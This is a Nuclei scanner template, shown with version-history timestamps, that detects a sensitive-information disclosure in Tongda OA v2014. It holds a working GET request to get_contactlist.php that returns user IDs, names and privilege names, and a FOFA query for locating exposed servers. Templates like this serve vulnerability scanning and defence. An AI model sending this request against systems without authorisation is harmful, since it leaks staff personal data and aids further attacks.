nuclei-templates/http/vulnerabilities/tongda/tongda-contact-list-exposur...

36 lines
1.1 KiB
YAML
Raw Normal View History

2023-09-14 19:11:38 +00:00
id: tongda-contact-list-exposure
2023-09-06 19:45:50 +00:00
info:
2023-09-14 19:11:38 +00:00
name: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure
2023-09-06 19:45:50 +00:00
author: SleepingBag945
severity: medium
description: |
There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2023-09-14 19:11:38 +00:00
fofa-query: app="TDXK-通达OA"
2023-09-06 19:45:50 +00:00
tags: tongda,oa,exposure
2023-09-14 19:11:38 +00:00
2023-09-06 19:45:50 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3"
matchers-condition: and
matchers:
- type: word
words:
2023-09-14 19:11:38 +00:00
- 'user_uid":'
- 'user_name":'
- 'priv_name":'
condition: and
2023-09-06 19:45:50 +00:00
- type: status
status:
2023-10-14 11:27:55 +00:00
- 200
# digest: 490a00463044022042cf14f510cd9824fefac0781358bf2bcf98e628a115eaf65b1159bdb5687124022075950c137b4a82e5aee17d9ea6570f448ce536f38a72f351911ca0df4ec7e47f:922c64590222798bb761d5b6d8e72950